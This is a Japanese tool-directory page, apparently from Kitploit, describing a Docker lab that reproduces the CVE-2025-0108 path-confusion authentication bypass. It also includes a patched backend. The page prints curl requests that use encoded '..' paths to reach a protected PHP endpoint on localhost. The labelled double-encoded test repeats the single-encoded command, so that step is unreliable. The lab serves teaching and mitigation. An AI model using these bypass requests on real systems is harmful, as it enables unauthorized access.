Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-0108 — CVE-2025-0108のパス混乱脆弱性をNginx/Apacheスタックで再現します。脆弱なPoCと、二重エンコードされた認証バイパスに対するバックエンド側の緩和策を示すパッチ適用済みの実装を含みます。 | Kitploit
ツール/GitHubGitHub/kso4more/cve-2025-0108
脆弱性分析ウェブアプリケーション悪用認証設定ミス学習と教育ラボと実践
GitHubkso4more/cve-2025-0108

CVE-2025-0108

CVE-2025-0108のパス混乱脆弱性をNginx/Apacheスタックで再現します。脆弱なPoCと、二重エンコードされた認証バイパスに対するバックエンド側の緩和策を示すパッチ適用済みの実装を含みます。

リポジトリを見る
5ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-0108 — WebSecurity(PoCと修正)

このリポジトリは、CVE-2025-0108の問題(NginxとApache間のパス混乱 / ヘッダースマグリング)を再現および軽減するための小さなラボ環境を含んでいます。
この課題の目的は、二重エンコードされたリクエストがマルチレイヤースタック(Nginx -> Flaskバックエンド -> Apache/PHP)で認証をバイパスする方法を示し、バックエンド側の緩和策を示すことです。

この環境は教育目的のみで使用されます。

内容

  • CVE-2025-0108/ — 脆弱な実装(PoC)
  • CVE-2025-0108_fix/ — 修正済み実装(バックエンドでデコードされたパスを検証)

PoC(脆弱) — CVE-2025-0108

目的

レイヤー間のパスデコードの不一致により、二重エンコードされたパスが認証をバイパスできる脆弱なセットアップをシミュレートします。

環境の起動

CVE-2025-0108 ディレクトリから:

root@kitploit:~
cd CVE-2025-0108
docker compose up --build

テスト

ホストから以下のcurlコマンドを実行します:

テスト1 — 二重エンコード(予想: HTTP 200)

root@kitploit:~
curl -i "http://127.0.0.1:8085/unauth/%2e%2e/php/ztp_gate.php/PAN_help/x.css"

このリクエストは二重エンコード(%252e%252e == %2e%2e == ..)を使用し、脆弱なセットアップでのバイパスを示します。200 OKを返すはずです。

テスト2 — 単一エンコード(予想: HTTP 401)

root@kitploit:~
curl -i "http://127.0.0.1:8085/unauth/%2e%2e/php/ztp_gate.php/PAN_help/x.css"

テスト3 — 生のパス「..」(予想: HTTP 401)

root@kitploit:~
curl -i "http://127.0.0.1:8085/unauth/../php/ztp_gate.php/PAN_help/x.css"

環境の停止:

root@kitploit:~
docker compose down

修正版 — CVE-2025-0108_fix

バックエンドはアクセスを許可する前に、デコードされたパスの追加チェックを実行します。これにより、リクエストが二重エンコードされた場合の認証バイパスを防止します。

CVE-2025-0108 ディレクトリから:

root@kitploit:~
cd CVE-2025-0108
docker compose up --build

テスト

ホストから以下のcurlコマンドを実行します:

CVE-2025-0108_fix ディレクトリから:

root@kitploit:~
cd CVE-2025-0108_fix
docker compose up --build

テスト1 — 二重エンコード(予想: HTTP 401)

root@kitploit:~
curl -i "http://127.0.0.1:8085/unauth/%2e%2e/php/ztp_gate.php/PAN_help/x.css"

修正されたバックエンドはデコードされた「..」を検出し、401 Unauthorizedを返します。

テスト2 — 単一エンコード(予想: HTTP 401)

root@kitploit:~
curl -i "http://127.0.0.1:8085/unauth/%2e%2e/php/ztp_gate.php/PAN_help/x.css"

テスト3 — 生のパス「..」(予想: HTTP 401)

root@kitploit:~
curl -i "http://127.0.0.1:8085/unauth/../php/ztp_gate.php/PAN_help/x.css"

環境の停止:

root@kitploit:~
docker compose down
ツールをダウンロード